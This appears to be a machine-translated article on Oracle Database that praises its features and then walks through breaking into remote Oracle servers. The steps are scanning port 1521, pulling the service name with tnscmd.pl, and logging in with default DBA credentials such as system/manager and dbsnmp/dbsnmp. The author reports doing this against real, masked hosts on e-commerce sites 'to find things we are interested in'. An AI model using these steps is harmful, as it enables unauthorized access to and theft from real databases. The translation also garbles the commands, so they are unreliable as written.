Oracle Database has default password threats

Oracle Database is a very popular database system. Many large websites use Oracle. It is favored by users because it has the following outstanding features:

1. Supports high-performance transaction processing for large databases and multiple users. Oracle supports the maximum database size, which can be several hundred gigabytes, making full use of hardware devices. A large number of users can execute various data applications on the same data at the same time, minimizing data contention and ensuring data consistency. With high system maintenance performance, Oracle can work 24 consecutive hours a day. Normal system operations (backup or some computer system faults) will not interrupt the use of databases. The availability of database data can be controlled at the database level or at the sub-database level.

2. Oracle complies with industrial standards for data access languages, operating systems, user interfaces, and network communication protocols. Therefore, it is an open system that protects users' investment. The American Institute of Standardization and Technology (NIST) tests Oracle7 SERVER, 100% compatible with the second-level ANSI/ISO SQL89 standard.

3. Implement Security Control and integrity control. Oracle provides reliable system security to restrict access to various monitoring data. Oracle implements data integrity and specifies standards for acceptable data.

4. supports distributed databases and distributed processing. To make full use of computer systems and networks, Oracle allows processing to be divided into database servers and customer applications. All shared data management is processed by the computer of the database management system, the workstations running database applications focus on interpreting and displaying data. In a network-connected computer environment, Oracle combines data stored on multiple computers into a logical database, which can be accessed by all network users. Distributed Systems are as transparent and data consistent as centralized databases.

Portability, compatibility, and connectivity. Since Oracle software can run on many different operating systems, applications developed on Oracle can be transplanted to any operating system with little modification or no modification required. Oracle software is compatible with industrial standards, including many industrial standard operating systems. The developed application systems can run on any operating system. Connectivity means that ORALCE allows different types of computers and operating systems to share information over the network.

Although the Oracle database has high security, it is also very dangerous if we do not pay attention to security awareness during configuration. That is to say, the most important thing about security is relying on people rather than software.

As we know, in mssql, the login password of a sa is blank by default after the installation is complete. If you do not change the password, a security vulnerability will occur. What about oracle? Yes. For ease of installation and debugging, the default password of Sys and System for two users with DBA permissions in Oracle Database is manager. I found that Oracle databases on many Chinese websites did not change the passwords of these two users, including many large e-commerce websites, we can use this default password to find things we are interested in. For more information, see the following article.

Before testing, we first need to know some relevant knowledge. When we connect to an Oracle database, we need to know its service_name or Sid value, just like mssql. We need to know the database name. So how can we know? Obviously, this is not the case. Here we will first talk about oracle's TNS listener, which is located between the database Client and the database Server. By default, it listens to port 1521, which can be changed. However, if you use a tcp session to connect to port 1521, oracle will not return its banner. If you enter something, it may even kick you out. Here we need to use tnscmd. pl is a perl program. It can query whether the remote oracle database is enabled (that is, ping), query the version, and query its service name, service status, and database service name, and the accuracy is very high.

If there is anything you don't know about the theory, you can find the relevant materials. Start testing now. The required tools include ActivePerl, Oracle client, Superscan or other software for port scanning, Tnscmd. pl.

We first use Superscan to scan hosts opened on port 1521, assuming that the IP address is xx. xx.110.110, so that the target already exists. What we need to do is to use Tnscmd. pl to query the service name of the remote database. The usage of Tnscmd. pl is as follows:

C: \ perl \ bin> perl tnscmd. pl Usage: tnscmd. pl [command]-h hostname Where 'command' is something like ping, version, status, etc. (Default is ping) [-P port]-alternate TCP port to use (default is 1521) [-- Logfile]-write raw packets to specified logfile [-- Indent]-indent & outdent on parens [-- Rawcmd command]-build your own CONNECT_DATA string [-- Extract size bytes]-fake TNS command size (reveals packet leakage)

Below we only use a few simple commands, and other commands are also very useful. Let's explore them together.

Then we will:

C: \ perl \ bin> perl tnscmd. pl services-h xx. xx.110.110-p 1521-indent Sending (CONNECT_DATA = (COMMAND = services) to xx. xx.110.110: 1521 Writing 91 bytes Reading ...... 6 .........?. .......... DESCRIPTION = TMP = VSNNUM = 135286784 ERR = 0 SERVICES_EXIST = 1 . Q ........ SERVICE = SERVICE_NAME = ORCL INSTANCE = INSTANCE_NAME = ORCL NUM = 1 INSTANCE_CLASS = ORACLE HANDLER = HANDLER_DISPLAY = DEDICATED SERVER STA = ready HANDLER_INFO = LOCAL SERVER HANDLER_MAXLOAD = 0 HANDLER_LOAD = 0 ESTABLISHED = 447278 REFUSED = 0 HANDLER_ID = 8CA61D1BBDA6-3F5C-E030-813DF5430227 HANDLER_NAME = DEDICATED ADDRESS = PROTOCOL = beq PROGRAM =/home/oracle/bin/oracle ENVS = 'oracle _ HOME =/home/ORACLE, ORACLE_SID = ORCL' ARGV0 = oracleORCL ARGS =' LOCAL = NO ' .........@

From the above information, we can see that the database service is named ORCL, and then we can remotely connect to it through the sqlplus tool, we use the default system/manager or sys/manager for the user name and password, and use other methods such as mdsys/mdsys and ctxsys, the Default User and password change with the version. As follows:

C: \ oracle \ ora90 \ BIN> sqlplus/nolog SQL * Plus: Release 9.0.1.0.1-Production on Thu May 23 11:36:59 2002 (C) Copyright 2001 Oracle Corporation. All rights reserved. SQL> connect system/manager @ (Description = (address_list = (address = (protocol = tcp) (Host = xx. xx.110.110) (port = 1521 ))) (Connect_data = (SERVICE_NAME = ORCL )));

If the password is correct, the system will prompt connected. If not, change the default user name and password. After my attempt, dbsnmp and dbsnmp can be used. Of course, if the other party has changed the default password, we can only change to another target. However, I found that many of them do not change. This is a security awareness problem.

(